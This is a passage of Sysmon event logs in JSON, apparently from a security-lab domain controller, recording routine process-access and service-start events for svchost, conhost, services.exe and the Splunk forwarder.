C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:31.297","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3161,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.297\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:31.297","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3162,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.297\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:31.297","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3163,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.297\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:31.297","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3164,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.297\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:31.297","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3165,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.297\r\nSourceProcessGUID: {41C8662E-1F74-5F25-0000-0010C4650300}\r\nSourceProcessId: 3884\r\nSourceThreadId: 3904\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-1FF3-5F25-0000-0010BE510500}\r\nTargetProcessId: 4556\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:31.297","SourceProcessGUID":"{41C8662E-1F74-5F25-0000-0010C4650300}","SourceProcessId":"3884","SourceThreadId":"3904","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-1FF3-5F25-0000-0010BE510500}","TargetProcessId":"4556","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3166,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.568\r\nProcessGuid: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nProcessId: 4576\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nFileVersion: 8.0.2\r\nDescription: splunkd service\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunkd.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589\r\nParentProcessGuid: {41C8662E-1F61-5F25-0000-00102F530000}\r\nParentProcessId: 856\r\nParentImage: C:\\Windows\\System32\\services.exe\r\nParentCommandLine: C:\\Windows\\system32\\services.exe","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:55:31.568","ProcessGuid":"{41C8662E-1FF3-5F25-0000-00109F540500}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","FileVersion":"8.0.2","Description":"splunkd service","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunkd.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589","ParentProcessGuid":"{41C8662E-1F61-5F25-0000-00102F530000}","ParentProcessId":"856","ParentImage":"C:\\Windows\\System32\\services.exe","ParentCommandLine":"C:\\Windows\\system32\\services.exe","EventReceivedTime":"2020-08-01 07:55:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3167,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.563\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-00102F530000}\r\nSourceProcessId: 856\r\nSourceThreadId: 948\r\nSourceImage: C:\\Windows\\system32\\services.exe\r\nTargetProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nTargetProcessId: 4576\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\services.exe+12bee|C:\\Windows\\system32\\services.exe+66f4|C:\\Windows\\system32\\services.exe+5154|C:\\Windows\\system32\\services.exe+d608|C:\\Windows\\system32\\services.exe+4c6c|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:31.563","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-00102F530000}","SourceProcessId":"856","SourceThreadId":"948","SourceImage":"C:\\Windows\\system32\\services.exe","TargetProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","TargetProcessId":"4576","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\services.exe+12bee|C:\\Windows\\system32\\services.exe+66f4|C:\\Windows\\system32\\services.exe+5154|C:\\Windows\\system32\\services.exe+d608|C:\\Windows\\system32\\services.exe+4c6c|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3168,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.563\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2336\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nTargetProcessId: 4576\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:31.563","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2336","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","TargetProcessId":"4576","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:55:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
